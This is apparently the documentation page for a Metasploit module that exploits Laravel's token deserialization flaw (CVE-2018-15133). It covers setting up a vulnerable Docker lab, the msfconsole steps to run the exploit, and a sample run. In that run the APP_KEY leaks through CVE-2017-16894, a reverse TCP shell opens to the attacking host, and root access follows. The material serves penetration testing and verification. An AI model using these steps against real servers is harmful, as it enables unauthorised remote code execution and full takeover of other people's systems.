## Vulnerable Application

[Laravel](https://laravel.com/) is an actively-maintained PHP Framework web development suite.

This module exploits an unauthenticated vulnerability that allows for PHP object deserialization and command execution.
The vulnerability was discovered by [Ståle Pettersen](https://github.com/kozmic/laravel-poc-CVE-2018-15133)

The module may also uses CVE-2017-16894 to check for a leaked key. Another leaked key method is available which may not be known and perhaps 0day?

### Setting up Laravel on Debian

- `git clone https://github.com/kozmic/laravel-poc-CVE-2018-15133`
- Edit Dockerfile and change `sed -i -e 's/5.7.\*/5.6.29/g'` to `sed -i -e 's/5.8.\*/5.6.29/g'` (needs to be 5.8 as 5.7 is removed from mirror)
- `docker build -t laravel-poc-cve-2018-15133 .`
- `docker run -d -p 8000:8000 laravel-poc-cve-2018-15133`

## Verification Steps

- `./msfconsole`
- `use exploits/unix/http/laravel_token_unserialize_exec`
- `set RHOST <rhost>`
- `set RPORT <rport>`
- `set APP_KEY <base64_string>`
- `check`
- `exploit`

## Scenarios

```
msf exploit(unix/http/laravel_token_unserialize_exec) > check

[*] 172.22.222.112:8000 - APP_KEY not set. Will try to find it...
[*] 172.22.222.112:8000 - Checking for CVE-2017-16894 .env information leak
[+] 172.22.222.112:8000 - APP_KEY Found via Laravel Framework error information leak: uV1jO3mpnhtdvcsSi1EIUVtSMBXeAvWtL3lmNwx7n9Q=
[+] 172.22.222.112:8000 - The target is vulnerable.
msf exploit(unix/http/laravel_token_unserialize_exec) > exploit

[*] Started reverse TCP handler on 172.22.222.136:4444 
[*] 172.22.222.112:8000 - APP_KEY not set. Will try to find it...
[*] 172.22.222.112:8000 - Checking for CVE-2017-16894 .env information leak
[+] 172.22.222.112:8000 - APP_KEY Found via Laravel Framework error information leak: uV1jO3mpnhtdvcsSi1EIUVtSMBXeAvWtL3lmNwx7n9Q=
[*] Command shell session 36 opened (172.22.222.136:4444 -> 172.22.222.112:49506) at 2019-07-12 08:16:05 -0500

uname -a
Linux 03cc598c00af 4.18.0-25-generic #26~18.04.1-Ubuntu SMP Thu Jun 27 07:28:31 UTC 2019 x86_64 GNU/Linux
whoami
root
```
